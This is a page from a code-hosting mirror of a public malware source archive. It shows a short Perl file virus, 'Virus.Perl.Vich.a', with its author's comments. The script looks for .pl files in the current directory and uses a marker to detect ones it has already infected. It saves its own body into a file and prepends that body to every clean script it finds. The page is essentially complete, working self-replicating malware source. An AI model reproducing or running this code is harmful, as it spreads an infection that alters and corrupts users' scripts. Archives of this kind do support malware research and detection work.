ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71de2a7087
MalwareSourceCode/Perl/Virus.Perl.Vich.a

88 lines
2.1 KiB
Plaintext
Raw Normal View History

Add files via upload
2020-10-10 02:59:39 +00:00
#onehalf3554
# this perl virus (c)Chernickevich Konstantin
# http://onehalf.hotmail.ru
# email:onehalf3554@mail.ru
system"clear";
$partone="#End_my";
$parttwo="_body";
$EndMarker=$partone.$parttwo;
$infected=0;
$BodyCopy=0;
$textold="";
# this "while" for detecting *.pl file
# and output in the $_ local perl variable
while (<*.pl>)
{
$files=$_;
$text="<".$_;
$textw=">".$_;
$textww=">>".$_;
open(TESTFILE,$text);
until(eof(TESTFILE))
{
$strres=readline(TESTFILE);
# this procedure detecting a marker in the *.pl file
# if marker detected then file infected if not then file not infected!
if ($strres=~ m/onehalf3554/i)
{
if ($BodyCopy==0)
{
$BodyCopy=1;
open(VIRUSBODY,$text);
until ($BodyStr=~ m/$EndMarker/i)
{
$BodyStr=readline(VIRUSBODY) ;
$BodyLoopCount++;
$BodyArray[$BodyLoopCount]=$BodyStr;
}
close(VIRUSBODY);
}
$infected=1;
}
}
close (TESTFILE);
if ($infected==1)
{
print "[im detecting old infecting file :]\n";
print $textw." infected old time.[Ok]\n";
open(RESERVBODY,">body.bod");
print RESERVBODY @BodyArray;
close(RESERVBODY);
}
if ($infected==0)
{
print $textw."im trying infecting this file now! \n";
system "cp ".$files." temp.bod";
open(NULFILE,$textww);
$NUL="";
print NULFILE $NUL;
system "cp body.bod"." ".$files;
open(DATAFILE,"<temp.bod");
until(eof(DATAFILE))
{
$reloader=readline(DATAFILE);
print NULFILE $reloader;
}
close(DATAFILE);
close(NULFILE);
}
}
#End_my_body
Reference in New Issue Copy Permalink